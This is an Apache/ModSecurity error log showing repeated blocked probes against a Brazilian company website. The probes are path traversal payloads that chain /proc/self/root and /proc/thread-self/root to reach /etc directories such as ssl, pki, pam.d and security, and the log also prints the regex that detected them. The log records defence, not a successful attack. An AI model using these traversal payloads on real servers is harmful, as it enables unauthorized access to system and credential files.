[Tue Mar 17 16:20:55.782911 2026] [:error] [pid 29151:tid 140411691570944] [client 74.7.241.31:40066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpl_PqhzTj3BvfDX-VtQAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:57.138064 2026] [:error] [pid 29151:tid 140411708356352] [client 74.7.241.31:40072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpmfPqhzTj3BvfDX-VtwAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:20:59.129816 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58408] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:20:59.555508 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.241.31:44668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpm6BJNF7axNlVR0UmkgAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:02.055306 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.31:44672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpngeiSKl8TjouI-YmFAAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:03.366800 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:44680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpn9Y0UrI5A3LftIwLNwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:03.866249 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.243.128:46348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpn64xEDsg_V3ESNZZbQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:21:05.744233 2026] [:error] [pid 2598:tid 140411540502272] [client 74.7.241.31:44688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpoRj0p0SRWAqcjGGHtgAAAxg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:07.232880 2026] [:error] [pid 25836:tid 140411674785536] [client 74.7.241.31:44702] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpo4h-PF_25v4hFRB5JwAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:08.547892 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.241.31:45078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmppPPqhzTj3BvfDX-VugAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:10.900793 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.31:45084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmppgeiSKl8TjouI-YmGwAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:13.256418 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.241.31:45098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpqcU6Sx0TG1YjmQi8mgAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:16.656886 2026] [:error] [pid 25836:tid 140411599251200] [client 74.7.241.31:45100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmprIh-PF_25v4hFRB5LAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:21:21.562639 2026] [:error] [pid 19507:tid 140411641214720] [client 74.7.243.128:42908] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpsdY0UrI5A3LftIwLTAAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:21:22.136569 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58754] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:21:23.274222 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.241.31:48838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmps4h-PF_25v4hFRB5MQAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:21:42.548426 2026] [:error] [pid 7004:tid 140411565680384] [client 74.7.241.31:48856] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpxsU6Sx0TG1YjmQi8twAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:21:42.943134 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.243.128:53662] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpxhj0p0SRWAqcjGGHzgAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:21:43.133862 2026] [proxy_fcgi:error] [pid 7004:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59046] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:21:53.048160 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.241.31:52548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmp0dY0UrI5A3LftIwLXgAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:22:10.129805 2026] [proxy_fcgi:error] [pid 18380:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59460] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:22:28.665434 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.241.31:43524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmp9K4xEDsg_V3ESNZZkQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:22:31.125885 2026] [proxy_fcgi:error] [pid 17965:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:22:58.118985 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60098] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:23:18.301117 2026] [:error] [pid 25836:tid 140411725141760] [client 74.7.241.31:50970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqJoh-PF_25v4hFRB5WgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:20.045191 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:52056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqKBj0p0SRWAqcjGGH7AAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:23:21.587116 2026] [:error] [pid 18380:tid 140411548894976] [client 74.7.241.31:52070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmqKa4xEDsg_V3ESNZZogAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
